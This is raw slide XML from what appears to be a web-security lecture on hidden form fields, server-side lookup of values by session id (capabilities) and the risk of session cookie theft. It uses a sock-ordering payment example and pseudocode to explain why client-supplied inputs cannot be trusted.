            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9762210" y="625078"/>
            <a:ext cx="14390485" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="med">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46"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="346"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34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343"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34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0.000000 0.000000 L -0.000126 0.115368" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="346"/>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type="lt">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="344"/>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grpId="5" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.000126 0.115368 L -0.000000 0.230737" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="346"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="7" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="345"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="32"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5" animBg="1" advAuto="0"/>
      <p:bldP spid="343" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="344" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="345" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="346" grpId="1"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2" name="Using capabilities"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4151837" y="623535"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Using capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="&lt;html&gt;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4415005" y="4519710"/>
            <a:ext cx="15553989" cy="77882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l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;head&gt; &lt;title&gt;Pay&lt;/title&gt; &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;form action=“submit_order” method=“GET”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>The total cost is $5.50. Confirm order?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“hidden” name=“price” value=“5.50”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“submit” name=“pay” value=“yes”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;input type=“submit” name=“pay” value=“no”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="&lt;input type=“hidden” name=“sid” value=“781234”&gt;"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429802" y="8336581"/>
            <a:ext cx="15199904" cy="77787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4200">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>&lt;input type=“hidden” name=“sid” value=“781234”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="What’s presented to the user"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7768276" y="2999090"/>
            <a:ext cx="8847448"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What’s presented to the user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14592624" y="8358096"/>
            <a:ext cx="5168308" cy="723223"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 26340"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="114300">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>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07" name="Capability;…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16054632" y="3972553"/>
            <a:ext cx="5058824" cy="2978022"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16860"/>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p>
            <a:pPr>
              <a:defRPr sz="4200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Capability;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>the system will detect a change and abort</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211874450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506"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="506"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="2" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="507"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="507"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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0" animBg="1" advAuto="0"/>
      <p:bldP spid="506" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="507" grpId="0"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0" name="if(pay == yes &amp;&amp; price != NULL)…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5887708" y="4806149"/>
            <a:ext cx="12608584" cy="46132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200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if(pay == yes &amp;&amp; price != NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	bill_creditcard(price);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	deliver_socks();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="The corresponding backend processing"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6080471" y="2962162"/>
            <a:ext cx="1222305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The corresponding backend processing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="But: we don’t want to pass hidden fields around all the time…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3015574" y="10059344"/>
            <a:ext cx="18289353" cy="2174876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DCDEE0"/>
          </a:solidFill>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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>But: we don’t want to pass hidden fields around all the time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="617361" indent="-617361" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4200"/>
            </a:pPr>
            <a:r>
              <a:t>Tedious to add/maintain on all the different pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="617361" indent="-617361" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4200"/>
            </a:pPr>
            <a:r>
              <a:t>Have to start all over on a return visit (after closing browser window)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="513" name="price = lookup(sid);…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5887708" y="4181375"/>
            <a:ext cx="12608584" cy="5248276"/>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200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>price = </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lookup(sid)</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if(pay == yes &amp;&amp; price != NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	bill_creditcard(price);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	deliver_socks();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	display_transaction_cancelled_page();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Using capabilities"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4151837" y="623535"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Using capabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16509459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13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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advAuto="0"/>
      <p:bldP spid="513" grpId="0" animBg="1" advAuto="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2" name="Cookie Theft"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4214753" y="629118"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Cookie Theft</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Session cookies are, once again, capabilities…"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4214753" y="3207472"/>
            <a:ext cx="15609095" cy="9336129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Session cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> are, once again, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The holder of a session cookie gives access to a site with the privileges of the user that established that session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Thus, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>stealing a cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> may allow an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>impersonate a legitimate user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Actions that will seem to be due to that user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Permitting theft or corruption of sensitive data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118635366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0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0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0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0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6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 grpId="0" build="p"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Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4179851" y="3117785"/>
            <a:ext cx="16006438" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Which inputs in my program should not be trusted?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These start from input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>untrusted sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And these inputs </a:t>
            </a:r>
            <a:r>
